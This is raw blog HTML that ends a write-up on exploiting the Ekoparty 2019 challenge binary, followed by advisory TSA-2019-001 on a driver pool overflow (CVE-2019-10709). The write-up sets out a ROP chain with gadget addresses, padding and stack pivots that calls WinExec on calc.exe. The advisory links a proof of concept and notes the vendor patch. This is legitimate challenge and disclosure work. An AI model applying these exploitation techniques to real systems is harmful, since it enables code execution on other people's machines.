<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 47 8b 01 mov rax,QWORD PTR [rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">3: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Then adding RCX as the Image Base Address+0x9010 , I get the leaked address for Winexec on the stack.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">For the final request to the application I used <o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 51 push rcx</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">1: 48 8b 01 mov rax,QWORD PTR [rcx]</span><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">4: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">I set the RCX to a pivot gadget “add rsp,78h ; ret”, so I can stack pivot.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">I used Ropper and rp++ to get gadgets out of the application.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Thankfully, the ret instruction gets us to a point in our buffer.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">According to MSDN Wincalc requires 2 arguments, the name of the application and a number which will set the mode of the window.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In windows 10 x64 , the calling convention is rcx,rdx,r8,r9 and top of the stack.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The structure of the packet is this. The whole packet is the cookie + 528 characters.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Structure:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="background-color: #b8cce4; border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|16 junk bytes| - padding<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|pop_rax_gadget| - Pop Image Base Address for having a valid address on RAX because the only pop rdx and pop rdx gadgets set bad values to it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|Image Base Address – 0x08| - valid address<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|pop_rdx_gadget| - pop rdx gadget to put 0x01 for the Wincalc second argument.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|0x01|- Winexec UINT uCmdShow<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|pop_rax_gadget| - again for the same reason that the pop rcx gadget will set bad value to rax<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|pop_rcx_gadget| - set the pointer address that points to calc.exe\x00<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|address_pointing_calc| - address that points to calc.exe\x00<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|72 junk bytes| - padding<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|ret_gadget| - just a return gadget to fix the stack alignment to 16-byte format, because CreateProcessA is called inside the Winexec function which includes movabs instruction. Movabs instructions check if the stack is aligned and if not it will raise an exception.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|winexec_leaked_address| - winexec address on the stack.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|add_rsp_0x78| - adds to current RSP + 0x78 bytes to reach the next stack pivot.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|120 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|add_rsp_0x78| - adds to current RSP + 0x78 bytes to reach the next stack pivot.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|120 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|add_rsp_0x28| - adds to current RSP + 0x28 bytes to reach the next stack pivot.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|40 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|add_rsp_0x58| - adds to current RSP + 0x58 bytes to reach the original return pointer address and continue the execution of the application instead of crashing it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|8 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|calc.exe\x00| - string to set in memory.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|15 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Gadgets Used:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="background-color: #c6d9f1; border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 467.5pt;" valign="top" width="468"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x14000158b: add rsp, 0x78 ; ret ; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x0000000140004525: pop rdx; add byte ptr [rax], al; cmp word ptr [rax], cx; je 0x4530; xor eax, eax; ret; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x140001167: pop rax ; ret ; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span lang="EN-US" style="font-size: 14pt;">0x00000001400089ab: pop rcx; or byte ptr [rax], al; add byte ptr [rax - 0x77], cl; add eax, 0x4b12; add rsp, 0x48; ret;<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x0000000140001164: add rsp, 0x58; ret; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x14000158f: ret ; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x00000001400011d5: add rsp, 0x28; ret;<o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The full working exploit can be downloaded here from our Github:<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><a href="https://github.com/telspacesystems/BFS-Ekoparty-2019-challenge/" style="font-family: -webkit-standard;">https://github.com/telspacesystems/BFS-Ekoparty-2019-challenge/</a></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span style="font-size: 14pt;">Mandatory calc.exe POC screenshot:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqhXYfzlHAFd9IJZBrjDGZEfJST2-v8hMpM4ASNIlGe7vXnsbGOlWnvmCnYlkaDfpu8pR8MW6UGxH0gupasCh63Se1TqQlktJk4fps8SciznucJM5SmUYPBttltGQjFCdtW5PLbDpCAvl/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="561" data-original-width="1107" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqhXYfzlHAFd9IJZBrjDGZEfJST2-v8hMpM4ASNIlGe7vXnsbGOlWnvmCnYlkaDfpu8pR8MW6UGxH0gupasCh63Se1TqQlktJk4fps8SciznucJM5SmUYPBttltGQjFCdtW5PLbDpCAvl/s400/5.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span style="font-size: 14pt;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span style="font-size: 14pt;"><br /></span></div>
<div align="center" class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt; text-align: center;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"></span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><o:p></o:p></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-40550406073796857552019-08-30T10:00:00.000+02:002019-08-30T10:01:23.463+02:00TSA-2019-001: Asus Precision TouchPad 11.0.0.25 (Pool Overflow)<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Telspace Systems Security Advisory</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">TSA-2019-001: </span></b><b><span style="color: #222222; font-family: "arial"; font-size: 10.5pt;">Asus Precision TouchPad 11.0.0.25 (Pool Overflow)</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">CVE number: CVE-2019-10709</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Summary:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #2a2a2a; font-family: "arial"; font-size: 10.5pt;">The AsusPTPFilter.sys driver on the Asus Precision TouchPad 11.0.0.25 hardware has a Pool Overflow associated with the </span><a href="https://www.blogger.com/null"><span style="font-family: "arial"; font-size: 10.5pt;">\\.\AsusTP</span></a><span style="color: #2a2a2a; font-family: "arial"; font-size: 10.5pt;">device, leading to a DoS and could potentially lead to privilege escalation via a crafted DeviceIoControl call with a specific IOCTL code.<o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Vendor:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Asus</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Product:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Asus Precision TouchPad</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Version:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">11.0.0.25</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Vendor:</span></b></div>
<div class="MsoNormal" style="background-color: white; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-size: 10.5pt;"><span style="font-family: "arial";"><b><br /></b></span></span><a href="https://www.asus.com/us/News/SupportNews/" style="color: purple; font-family: Calibri;"><span style="font-family: "helvetica"; font-size: 10.5pt;">https://www.asus.com/us/News/SupportNews/</span></a><span style="font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 0.0001pt; text-align: justify;">
<a href="https://www.asus.com/" style="color: purple;"><span style="font-family: "helvetica"; font-size: 10.5pt;">https://www.asus.com/</span></a><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Proof of Concept:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<a href="https://github.com/telspacesystems/Asus-DOS" style="color: purple;">https://github.com/telspacesystems/Asus-DOS</a></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="font-family: "arial"; font-size: 10.5pt;"><o:p> </o:p></span></b><b style="font-size: 11pt;"><span style="font-family: "arial"; font-size: 10.5pt;"><o:p> </o:p></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="font-family: "arial"; font-size: 10.5pt;">Details and crash information:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh83_MqXpWNyxRUAr8Us2xCsnneojmoSFo9wp_GcvxTSv4AchzfHEvlbzSms8dkSfvSbEqvyydIWBwZ67JmsRsYEb3joFRAMoy6qc2P8fwlufyMJkJZdJSvyoxiHtKiIsWI2ZQ5pDWgJpu5/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="771" data-original-width="606" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh83_MqXpWNyxRUAr8Us2xCsnneojmoSFo9wp_GcvxTSv4AchzfHEvlbzSms8dkSfvSbEqvyydIWBwZ67JmsRsYEb3joFRAMoy6qc2P8fwlufyMJkJZdJSvyoxiHtKiIsWI2ZQ5pDWgJpu5/s320/1.png" width="251" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil_G6Snhbn5NcBDhcdlLyvjjmO0QMSFE03DQQ_tYWyv2x7ZK0a96tcQ4MxZk7f6w74nq08TowTcmQbq2RN1kdP8GjuPwR-3smk7jMG-9ilKTywDktPOBcgv9kaBPLAGs_Ym1zrLKqpj0cq/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="975" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil_G6Snhbn5NcBDhcdlLyvjjmO0QMSFE03DQQ_tYWyv2x7ZK0a96tcQ4MxZk7f6w74nq08TowTcmQbq2RN1kdP8GjuPwR-3smk7jMG-9ilKTywDktPOBcgv9kaBPLAGs_Ym1zrLKqpj0cq/s320/2.png" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPq9cd4MpGMViXy5t1BM6HQChIxg0hz4bjMrw6I2GA0mHrEyt4Zvhcjj_lV8JmAWU2-3eHOaa0NomZ5ywleSyodvTLGwWltUjPRyyChUrC8meYZyB9PvGzF3uV072RRX04hXlmoSUAlrbS/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1350" data-original-width="921" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPq9cd4MpGMViXy5t1BM6HQChIxg0hz4bjMrw6I2GA0mHrEyt4Zvhcjj_lV8JmAWU2-3eHOaa0NomZ5ywleSyodvTLGwWltUjPRyyChUrC8meYZyB9PvGzF3uV072RRX04hXlmoSUAlrbS/s320/3.png" width="218" /></a></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
</div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
</div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 11.9pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Vendor response:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">The vendor has patched the vulnerability and released a new version. </span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
